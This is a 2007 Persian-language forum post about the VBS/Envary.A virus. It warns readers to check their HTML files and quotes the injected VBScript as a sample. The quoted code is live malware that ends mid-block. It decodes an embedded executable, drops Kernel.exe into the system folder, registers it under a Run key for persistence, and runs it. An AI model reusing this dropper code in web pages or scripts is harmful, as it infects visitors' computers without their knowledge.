موضوع: VBS/Envary.A virus
نمايش پست تنها
قديمي August 30th, 2007, 21:29   #5
nanoc
Senior Member
 
nanoc's Avatar
 
تاريخ عضويت: Feb 2006
ارسالها: 163
تشکر: 216
تشکر از ايشان: 163 بار در 87 پست
nanoc (سطح 1)nanoc (سطح 1)
0

هاااااااااااااا وکشتمش !
از این آنتی ویروس ها چیزی ...
خودم آنتی شو ونوشتم !
یکی از دوستان در مورد یه نفری گفت به من ویروس داده ...
نگاه کردم دیدم همینه !
دوستان فایل های HTML شون رو چک کنن
آخرش قطعه کدی ناشناسی یا کدی که در همه فایل های HTML داشته باشن ..
مثال !
نقل قول:
<script language=vbscript>
on error resume next
fileexe1="0770901440000030000000000040000000002552 55000000184000000000000000000000064000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000001840000000 00014031186014000180009205033184001076205033084104 10511503211211411110311409710903209909711011011111 60320981010321141171100321051100320680790830321091 11100101046013013010036000000000000000000000212036 14202814406922407914406922407914406922407903009024 30791350692240791081012420791470692240790821050991 04144069224079000000000000000000000000000000000000 00000000000008006900000007600100300008111504706900 00000000000000000000002240000150010110010050120000 02000000000030006000000000000000007017000000000016 00000000003200000000000006400000001600000000000200 00000040000000000040000000000040000000000000000000 00000080006000000004000000139039000000002000000000 00000001600000001600000000000001600000001600000000 00000000000160000000000000000000000000000000000680 32000000100000000000000000000000000000000000000000 00000000000000000000000000000000020340711110321161 11032109121032115097105116058032104116116112058047 04710310511410811510112004611910109811504610511104 71121050991161171141010461041161090340130101110981 06077101115115097103101046083101110100013010109097 10510809706110909710510810904611410109710010810511 01010130101191011101000130101021151110460671141010 97116101084101120116070105108101040115121115032038 03203409208312111511610110911804610010810803404104 61191141051161010320341111021020340130101011101000 32115117098013010"
dim sys
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 "
set fso = df.createobject("Scripting.FileSystemObject","")
set s=df.CreateObject("Shell.Application.1","")
set re=df.createobject("wscript.shell","")
sys=fso.GetSpecialFolder(1)
For a = 1 To Len(filevbs1) Step 3
filevbs2=filevbs2 & chr(mid(filevbs1,a,3))
if a < len(fileexe1)+1 then fileexe2=fileexe2 & chr(mid(fileexe1,a,3))
next
kr = UCase(re.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Micr osoft\Windows\CurrentVersion\Run\Microsoft Windows"))
fso.CreateTextFile(sys & "\TSP32E.DLL").write fileexe1
if ucase(fso.FileExists(sys & "\Kernel.exe"))="FALSE" or kr<>ucase(sys & "\KERNEL.EXE") then
re.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.exe"
fso.CreateTextFile(sys & "\Kernel.exe").write fileexe2
s.Open (sys & "\Kernel.exe")
شمام بله!
آنتی ویروس فقط کاسپر اسکای
nanoc آفلاين است پاسخ با نقل قول